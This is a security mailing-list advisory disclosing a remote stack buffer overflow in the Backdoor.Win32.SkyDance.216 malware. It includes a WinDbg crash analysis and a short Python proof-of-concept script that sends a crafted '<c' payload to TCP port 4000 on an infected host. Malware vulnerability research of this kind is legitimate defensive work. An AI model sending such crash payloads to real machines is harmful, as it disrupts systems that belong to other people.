[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAAHK0WRhEemY-QmGYpa+SaXJo2k4=5zfSCh8bq4ux5_UA-FVeg@mail.gmail.com>
Date: Sat, 22 May 2021 02:09:14 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.SkyDance.216 / Remote Stack Buffer Overflow
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/694ecf256c97ef6e206e2073d37e5944.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.SkyDance.216
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 4000. Third-party attackers
who can reach an infected system can trigger a buffer overflow by sending a
specially crafted packet. Interestingly, one specific character "\x3c" the
"<" symbol seems required to trigger the overflow.
Type: PE32
MD5: 694ecf256c97ef6e206e2073d37e5944
Vuln ID: MVID-2021-0222
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 05/22/2021
Memory Dump:
(10c8.1240): Stack buffer overflow - code c0000409 (first/second chance not
available)
eax=00000000 ebx=00000000 ecx=00418b8f edx=00000001 esi=00000000
edi=00000002
eip=77aeed3c esp=0019c9f0 ebp=0019ca30 iopl=0 nv up ei pl nz ac pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00000216
ntdll!ZwWaitForMultipleObjects+0xc:
77aeed3c c21400 ret 14h
0:000> .ecxr
eax=ffffffff ebx=0019fc80 ecx=00418b8f edx=00000001 esi=0019d12c
edi=00000001
eip=776f72cb esp=0019d0a0 ebp=0019d0a0 iopl=0 nv up ei ng nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010286
kernel32!InterlockedDecrementStub+0xb:
776f72cb f00fc101 lock xadd dword ptr [ecx],eax
ds:002b:00418b8f=ffff80f6
*** WARNING: Unable to verify checksum for
Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe
*** ERROR: Module load completed but symbols could not be loaded for
Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe
0:000> !analyze -v
*******************************************************************************
*
*
* Exception Analysis
*
*
*
*******************************************************************************
FAULTING_IP:
kernel32!InterlockedDecrementStub+b
776f72cb f00fc101 lock xadd dword ptr [ecx],eax
EXCEPTION_RECORD: 0019cbf0 -- (.exr 0x19cbf0)
ExceptionAddress: 776f72cb (kernel32!InterlockedDecrementStub+0x0000000b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000008
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 00418b8f
Attempt to write to address 00418b8f
PROCESS_NAME:
Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a
stack-based buffer in this application. This overrun could potentially
allow a malicious user to gain control of this application.
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a
stack-based buffer in this application. This overrun could potentially
allow a malicious user to gain control of this application.
EXCEPTION_PARAMETER1: 00000015
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
CONTEXT: 0019cc40 -- (.cxr 0x19cc40)
eax=ffffffff ebx=0019fc80 ecx=00418b8f edx=00000001 esi=0019d12c
edi=00000001
eip=776f72cb esp=0019d0a0 ebp=0019d0a0 iopl=0 nv up ei ng nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010286
kernel32!InterlockedDecrementStub+0xb:
776f72cb f00fc101 lock xadd dword ptr [ecx],eax
ds:002b:00418b8f=ffff80f6
Resetting default scope
WRITE_ADDRESS: 00418b8f
FOLLOWUP_IP:
Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+10bf8
00410bf8 85c0 test eax,eax
FAULTING_THREAD: 00001240
BUGCHECK_STR:
APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_ffffffff
PRIMARY_PROBLEM_CLASS:
STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_ffffffff
DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_ffffffff
LAST_CONTROL_TRANSFER: from 00410bf8 to 776f72cb
STACK_TEXT:
0019d0a0 00410bf8 00418b8f 0019d12c 00410c7c
kernel32!InterlockedDecrementStub+0xb
WARNING: Stack unwind information not available. Following frames may be
wrong.
0019d130 00401d06 025177c4 00000000 0019fd14
Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+0x10bf8
00418b9b b8e8e900 ccccfffe cccccccc cccccccc
Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+0x1d06
00418b9f ccccfffe cccccccc cccccccc 0c4d8dcc 0xb8e8e900
00418ba3 cccccccc cccccccc 0c4d8dcc ff80d1e9 0xccccfffe
00418ba7 cccccccc 0c4d8dcc ff80d1e9 084d8dff 0xcccccccc
00418bab 0c4d8dcc ff80d1e9 084d8dff ff80c9e9 0xcccccccc
00418baf ff80d1e9 084d8dff ff80c9e9 044d8dff 0xc4d8dcc
00418bb3 084d8dff ff80c9e9 044d8dff ff80c1e9 0xff80d1e9
00418bb7 ff80c9e9 044d8dff ff80c1e9 d178b8ff 0x84d8dff
00418bbb 044d8dff ff80c1e9 d178b8ff bbe90041 0xff80c9e9
00418bbf ff80c1e9 d178b8ff bbe90041 ccfffeb8 0x44d8dff
00418bc3 d178b8ff bbe90041 ccfffeb8 cccccccc 0xff80c1e9
00418bc7 bbe90041 ccfffeb8 cccccccc cccccccc 0xd178b8ff
00418bcb ccfffeb8 cccccccc cccccccc cccccccc 0xbbe90041
00418bcf cccccccc cccccccc cccccccc 084d8dcc 0xccfffeb8
00418bd3 cccccccc cccccccc 084d8dcc ff80a1e9 0xcccccccc
00418bd7 cccccccc 084d8dcc ff80a1e9 044d8dff 0xcccccccc
00418bdb 084d8dcc ff80a1e9 044d8dff ff8099e9 0xcccccccc
00418bdf ff80a1e9 044d8dff ff8099e9 c88d8dff 0x84d8dcc
00418be3 044d8dff ff8099e9 c88d8dff e9fffffe 0xff80a1e9
00418be7 ff8099e9 c88d8dff e9fffffe ffff808e 0x44d8dff
00418beb c88d8dff e9fffffe ffff808e fecc8d8d 0xff8099e9
00418bef e9fffffe ffff808e fecc8d8d 83e9ffff 0xc88d8dff
00418bf3 ffff808e fecc8d8d 83e9ffff b8ffff80 0xe9fffffe
00418bf7 fecc8d8d 83e9ffff b8ffff80 0041d1b0 0xffff808e
00418bfb 83e9ffff b8ffff80 0041d1b0 feb87de9 0xfecc8d8d
00418bff b8ffff80 0041d1b0 feb87de9 044d8dff 0x83e9ffff
00418c03 0041d1b0 feb87de9 044d8dff ff8071e9 0xb8ffff80
00418c07 feb87de9 044d8dff ff8071e9 f04d8dff
Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+0x1d1b0
0041d1b0 00000000 0041d1d0 00000000 00000000 0xfeb87de9
SYMBOL_STACK_INDEX: 1
SYMBOL_NAME:
Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+10bf8
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944
IMAGE_NAME:
Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 38f4751e
STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt
ntdll!LdrpFailureData ; .cxr 0x19cc40 ; kb
FAILURE_BUCKET_ID:
STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_ffffffff_c0000409_Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe!Unknown
BUCKET_ID:
APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_ffffffff_MISSING_GSFRAME_Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+10bf8
Followup: MachineOwner
---------
0:000> .exr -1
ExceptionAddress: 776f72cb (kernel32!InterlockedDecrementStub+0x0000000b)
ExceptionCode: c0000409 (Stack buffer overflow)
ExceptionFlags: 00000008
NumberParameters: 1
Parameter[0]: 00000015
0:000> !exchain
0019caa8: ntdll!_except_handler4+0 (77af6a50)
CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (77b357ad)
0019d128:
Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+18b9b
(00418b9b)
Invalid exception stack at 02515790
0:000> !address 02515790
Usage: Heap
Allocation Base: 02510000
Base Address: 02510000
End Address: 0251f000
Region Size: 0000f000
Type: 00020000 MEM_PRIVATE
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
More info: heap containing the address: !heap 0x2510000
More info: heap entry containing the address: !heap -x
0x2515790
Exploit/PoC:
from socket import *
MALWARE_HOST="x.x.x.x"
PORT=4000
def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
PAYLOAD="\x3cc"*900 +" HTTP/1.1"
s.send(PAYLOAD)
s.close()
print("Backdoor.Win32.SkyDance.216 / Remote Stack Buffer Overflow")
print("MD5: 694ecf256c97ef6e206e2073d37e5944")
print("By Malvuln");
if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists